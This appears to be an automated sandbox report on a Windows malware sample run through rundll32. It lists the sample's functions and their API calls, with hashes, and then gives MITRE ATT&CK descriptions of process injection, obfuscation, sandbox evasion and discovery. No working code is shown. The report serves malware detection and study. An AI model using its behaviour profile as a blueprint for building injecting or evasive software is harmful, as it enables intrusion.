Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: ec3a641e216a185bd78ecbc438bc13d87f5db804b927e4850762b185a28b3691
Instruction ID: b613db6df1a9d584c90bc316e9ceb9301e019043874f62a4a3004f86e8a1ce47
Opcode Fuzzy Hash: ec3a641e216a185bd78ecbc438bc13d87f5db804b927e4850762b185a28b3691
Instruction Fuzzy Hash: 5021AE31718E0C4FDBA8EF69E88A36977D1F788301B50842EE45FC3252DE34D8468782

Uniqueness

Uniqueness Score: -1.00%

Function 0097DE40, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0097DE73

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: da335d2c447da84aae6c9b62f194567d607a8ee5979d0c1815c78b0bceb4a567
Instruction ID: 4f688be3767a1a56d8f688ca137c994e5c3bff2e53e911ad19c1e3df7f73949e
Opcode Fuzzy Hash: da335d2c447da84aae6c9b62f194567d607a8ee5979d0c1815c78b0bceb4a567
Instruction Fuzzy Hash: DA11933160CB098F9B04FF28E845465B7F6EBD8311700853DE88FC7245EA74E9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 0097F11C, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00966454: RegCreateKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0096F46A), ref: 00966477

RegQueryValueExA.KERNELBASE ref: 0097F172

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: 3723b8b9b5c2c2c1b2545a7fcf67db104fe9ce5c31232c9ba3a0f24e8454262d
Instruction ID: 74af7b8b9268e4f6f374b83055b2937e677011e6070520da94d3af343e203865
Opcode Fuzzy Hash: 3723b8b9b5c2c2c1b2545a7fcf67db104fe9ce5c31232c9ba3a0f24e8454262d
Instruction Fuzzy Hash: FC21603151874C8FE741EF64C898BAAB7E5FB98354F40892EF48AC3251EB74D644CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00979984, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00981DF4: NtWriteVirtualMemory.NTDLL ref: 00981E13

VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009799D8

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 2dc9870131fd0860051e316fcfed74cb6eff8afdb10be7c3c6689af58a4bdf91
Instruction ID: 2919551e9b29daa5d157758be071c9d9ede69e7bef877f64d7f3cce29f2ce8ee
Opcode Fuzzy Hash: 2dc9870131fd0860051e316fcfed74cb6eff8afdb10be7c3c6689af58a4bdf91
Instruction Fuzzy Hash: 88012C71618B088FCB48EF5CE0C5525B7E0EB9C311B5045AEE94DC7296DB70DD45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0098CFBC, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 0098D00D

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ba6e3433fdab108305ac2d03281466bff2611a19c4de601f62fa2a2cec4b6e88
Instruction ID: fecd01f2dbaf5c8f6e3175e93698eab2ff8bcd18c98f0889b8fbb456886e80c7
Opcode Fuzzy Hash: ba6e3433fdab108305ac2d03281466bff2611a19c4de601f62fa2a2cec4b6e88
Instruction Fuzzy Hash: 92F06D31328B494BEB98EF69D498A2AB3E2FBD8301F44192DB54AC3351CB78C8458702

Uniqueness

Uniqueness Score: -1.00%

Function 0096C144, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 0096C271

Memory Dump Source

Source File: 00000018.00000002.863251713.0000000000961000.00000020.00000001.sdmp, Offset: 00961000, based on PE: false

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: d855418649368c674852ac1f37e291ddf3f6d3793cee7e1a4bfd0bc7f33a9241
Instruction ID: d28949e87aa469b03a3f711a79fad799b6800e05f6bb18d9ca2aebe9abe5b3cd
Opcode Fuzzy Hash: d855418649368c674852ac1f37e291ddf3f6d3793cee7e1a4bfd0bc7f33a9241
Instruction Fuzzy Hash: 75618F7061CB499FC768DF09C48597AB7E1FB99714F108A2EF4CA83211DB34E846CB82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2848 Parent PID: 5152 rundll32.exeCOMMON

Executed Functions

Function 0000016D9D00D9EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 0000016D9D00DAA0
NtQueryInformationToken.NTDLL ref: 0000016D9D00DAE8
NtClose.NTDLL ref: 0000016D9D00DB20

Strings

0, xrefs: 0000016D9D00DA4B

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 6c43f2ff5960bfd09b278ba2e093a21fe4c2b6a85f32282c41a7dce24e558e14
Instruction ID: ba463a169e96f15060b93521713874474334275d48a61b0b0c6e94eaabc3b5cd
Opcode Fuzzy Hash: 6c43f2ff5960bfd09b278ba2e093a21fe4c2b6a85f32282c41a7dce24e558e14
Instruction Fuzzy Hash: 29414A31609B488FDB64EF59D8C479AB7E2FBD8315F40492EE48EC3250DB349905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D004B78, Relevance: 4.8, APIs: 3, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 0000016D9D004BD1
VirtualAlloc.KERNELBASE ref: 0000016D9D004CD5
VirtualFree.KERNELBASE ref: 0000016D9D004DC3

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: a7761d1f540d36a5bd1c158696eb7ed9b0c136a9635e4a3f037942ce55945ef5
Instruction ID: a676fe824b56d9c8243c45c78ef62b77d3c9df38102630c99edf1b468ab80148
Opcode Fuzzy Hash: a7761d1f540d36a5bd1c158696eb7ed9b0c136a9635e4a3f037942ce55945ef5
Instruction Fuzzy Hash: EB91A231B08A088FE758DB29EC457BA73E5FB98305F00452EE98EC3291EE75D805C785

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D005428, Relevance: 4.2, APIs: 2, Instructions: 1183synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 0000016D9D0054F3
GetUserNameA.ADVAPI32 ref: 0000016D9D005787

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: CreateMutexNameUser
String ID:
API String ID: 3764123871-0
Opcode ID: 87ac470075bc0bacb572c229852d65eb044723e41051ddc64d69b327a8f4ccdf
Instruction ID: cb5431f3cdfa25da9234db2227da1615a69234d2447a17b317a1d1b1814d4125
Opcode Fuzzy Hash: 87ac470075bc0bacb572c229852d65eb044723e41051ddc64d69b327a8f4ccdf
Instruction Fuzzy Hash: 5E92B271B18E088FE758EF29EC896E937E1F794305F50852ED48BC31A1DE399946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D021002, Relevance: 3.4, APIs: 2, Instructions: 353nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?), ref: 0000016D9D021298
NtProtectVirtualMemory.NTDLL(?,?), ref: 0000016D9D021327

Memory Dump Source

Source File: 0000001A.00000002.863952316.0000016D9D021000.00000040.00000001.sdmp, Offset: 0000016D9D021000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 00b413b8ca482ce9bccf115d1661eb99aa6536ef13520903ca1e46e73cc46839
Instruction ID: 55fba580f40319f685ee760b1aedca9da2b7a0e3db04023ceddb757aa702135f
Opcode Fuzzy Hash: 00b413b8ca482ce9bccf115d1661eb99aa6536ef13520903ca1e46e73cc46839
Instruction Fuzzy Hash: 78B12232609F884FDB68DE29EC817E9B3E1FB95305F54452DD58FC3282E635A9068782

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFF1084, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0000016D9CFF10AA

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: fbf7a996bacbb3ee31b6b5631fb3dcd82c34a13d7030801ae3fd3b270ab54767
Instruction ID: 79e86b812836baa16dd3219ead5b0b91eddb028d142f2f2f4cda6e18cfdb3a3f
Opcode Fuzzy Hash: fbf7a996bacbb3ee31b6b5631fb3dcd82c34a13d7030801ae3fd3b270ab54767
Instruction Fuzzy Hash: 5101A230714A4C8FEB94DF69D8C4E6577E1FBA830DF54406EA409C3160EB39D882CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFE28F4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000016D9CFE6454: RegCreateKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000016D9CFEF46A), ref: 0000016D9CFE6477

RegQueryValueExA.KERNELBASE ref: 0000016D9CFE295D

Strings

(, xrefs: 0000016D9CFE2969
(, xrefs: 0000016D9CFE29A5

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: 70439f1d931ef6deb6e63df803fed06741b5ae7351a7f71008e576bc43ffe359
Instruction ID: fb692cf4cb784c5a6acabd2ce36ba61fd0615904dce5a0edf281e146ea703b15
Opcode Fuzzy Hash: 70439f1d931ef6deb6e63df803fed06741b5ae7351a7f71008e576bc43ffe359
Instruction Fuzzy Hash: A7319A706197088FF756DF14EC897A6B3E9FB88308F004A2DE44AC32A1EF799505CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D01187C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000016D9D0119B9

Strings

H, xrefs: 0000016D9D0118A0

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: 92e5d1011d5ac3511481310b22acfc4ae377deef14846c082cbaeb4d2dd61773
Instruction ID: 8f874e26d5994520babaae95c9a7453488a0a772e1054993250d79825d7f2a21
Opcode Fuzzy Hash: 92e5d1011d5ac3511481310b22acfc4ae377deef14846c082cbaeb4d2dd61773
Instruction Fuzzy Hash: 6BA1A031608F098FE758DF19E8887B5B7E1FB98305F04462ED44AC7165EB35D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D00144C, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000016D9CFFDE40: VirtualProtect.KERNELBASE ref: 0000016D9CFFDE73

VirtualProtect.KERNELBASE ref: 0000016D9D00156A
VirtualProtect.KERNELBASE ref: 0000016D9D00158D

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1c0704a25bf5be91b83301073394ca08df2f1bf8a09adb724fde02ed8a8c5447
Instruction ID: a8b1b9dccb45ae5e95c13e2f2e2fbe0b2faec444dd924cd409b86180c19ae181
Opcode Fuzzy Hash: 1c0704a25bf5be91b83301073394ca08df2f1bf8a09adb724fde02ed8a8c5447
Instruction Fuzzy Hash: 31617E71B18E099FE744EF19E8897A5B7E0FB59305F14416EE44EC36A1DB34E940CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFE30E8, Relevance: 3.1, APIs: 2, Instructions: 147COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 0000016D9CFE3146
RtlAddVectoredContinueHandler.NTDLL ref: 0000016D9CFE323A

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 9da6f8a69fee232d1e37c8dd212754dc583ca413fd983eb3bd025031f98905c0
Instruction ID: d0103c131da18106e1207a4bb8bf047f9dc6d601993e718490c636dc4f5f606d
Opcode Fuzzy Hash: 9da6f8a69fee232d1e37c8dd212754dc583ca413fd983eb3bd025031f98905c0
Instruction Fuzzy Hash: 2251B870B09B058FFB96DF29AC583BA77E5EB98309F45416EA44AC3291DF39C509C702

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFEB78C, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 0000016D9CFEB7CA
RegCloseKey.KERNELBASE ref: 0000016D9CFEB837

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 6ac68a6974238a40d0c984016d621410adb46f5d007b7ffb866acaf623e2f92d
Instruction ID: c4b0ec8d479fe28f36b64b8ba9a9bf2b6bdc38461338234d79f34578746b44bc
Opcode Fuzzy Hash: 6ac68a6974238a40d0c984016d621410adb46f5d007b7ffb866acaf623e2f92d
Instruction Fuzzy Hash: 49215130A19A088FE758EF28E88973577E1FB98355F24456EE449C3361EA34DD42CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFE6454, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000016D9CFEF46A), ref: 0000016D9CFE6477
RegOpenKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000016D9CFEF46A), ref: 0000016D9CFE6484

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 902b66cc257e73447aee148ba8278d1e0121bd882bb4cf5686835d95125ccaa8
Instruction ID: 47654d05723aa7da6dff659fb151ac1441fb667b1641f325247ce638f8ce30de
Opcode Fuzzy Hash: 902b66cc257e73447aee148ba8278d1e0121bd882bb4cf5686835d95125ccaa8
Instruction Fuzzy Hash: 6311C431B1CA4C8FEB84EF5CD488B69B7E0EBA8308F10042EE84DC3261DA75C9418743

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D005128, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 0000016D9D005158
QueueUserAPC.KERNELBASE(?,?,?,?,?,?,?,-00000002,0000016D9CFF6903), ref: 0000016D9D00516F

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 0859e9f174d93852fe63f47882d4427114e85758686e88d4c4f6dafd6fbe1a42
Instruction ID: 59737ba46e2f68142f18750bed17c11c83c5b13f737205849a6d3b5fb914ac4e
Opcode Fuzzy Hash: 0859e9f174d93852fe63f47882d4427114e85758686e88d4c4f6dafd6fbe1a42
Instruction Fuzzy Hash: 9E015231718A088FEB94EF6DE85D73977E2E7A8311F04456AE40AC3260DB78DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFFE8E4, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0000016D9CFFEA30

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2b30ea30a43a7e8191f5f9e07f64b3cb52e52f56fb394bd181dd2d5887e97efc
Instruction ID: db8a15f0e1c2373c647c7ba98d77398d9967959c32d1af3aa899aeab0fdaf56f
Opcode Fuzzy Hash: 2b30ea30a43a7e8191f5f9e07f64b3cb52e52f56fb394bd181dd2d5887e97efc
Instruction Fuzzy Hash: 6B618530719F099FE798EF18E885AA577E1FB6C315F50451EE84AC3261EB35E841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFFDE40, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0000016D9CFFDE73

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: da335d2c447da84aae6c9b62f194567d607a8ee5979d0c1815c78b0bceb4a567
Instruction ID: a13a0725131a1ccabb0cbbb5107d625feb1aba88a1d537e42e4c773821cdec8d
Opcode Fuzzy Hash: da335d2c447da84aae6c9b62f194567d607a8ee5979d0c1815c78b0bceb4a567
Instruction Fuzzy Hash: 1411843170CA098FAB54FF18A8455A5B7E6E798355B00462DE88AC3285EA74D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFFF11C, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000016D9CFE6454: RegCreateKeyA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000016D9CFEF46A), ref: 0000016D9CFE6477

RegQueryValueExA.KERNELBASE ref: 0000016D9CFFF172

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: 3723b8b9b5c2c2c1b2545a7fcf67db104fe9ce5c31232c9ba3a0f24e8454262d
Instruction ID: 2d1a80e00d9ba9b1aad6ce9ef594a558d53bbccdb812a101016b50ebf3ddd4e7
Opcode Fuzzy Hash: 3723b8b9b5c2c2c1b2545a7fcf67db104fe9ce5c31232c9ba3a0f24e8454262d
Instruction Fuzzy Hash: 3E21453061974C8FE741EF64D858BE6B7E1FB98318F40496DA446C3291EB74D644CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9D00CFBC, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 0000016D9D00D00D

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ba6e3433fdab108305ac2d03281466bff2611a19c4de601f62fa2a2cec4b6e88
Instruction ID: 74bcfe1d66e1e31e5694af25c42bd80cad9af430029806ae23d1655a4b1bbda5
Opcode Fuzzy Hash: ba6e3433fdab108305ac2d03281466bff2611a19c4de601f62fa2a2cec4b6e88
Instruction Fuzzy Hash: 27F0C231728B455BEB88DF2AE884B6AB3E2FBD8305F44552DB40AC3250CB79C8048702

Uniqueness

Uniqueness Score: -1.00%

Function 0000016D9CFEC144, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 0000016D9CFEC271

Memory Dump Source

Source File: 0000001A.00000002.863839236.0000016D9CFE1000.00000020.00000001.sdmp, Offset: 0000016D9CFE1000, based on PE: false

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: d855418649368c674852ac1f37e291ddf3f6d3793cee7e1a4bfd0bc7f33a9241
Instruction ID: 02ddefc72a5c0669dbb95c883ce9c0b7a86f5c3b39c89b2b09c87aa75cb52acc
Opcode Fuzzy Hash: d855418649368c674852ac1f37e291ddf3f6d3793cee7e1a4bfd0bc7f33a9241
Instruction Fuzzy Hash: DF718530A1CB458FE768DF08D88567AB7E1FB99718F10452EF4CA83251DB31E846CB82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

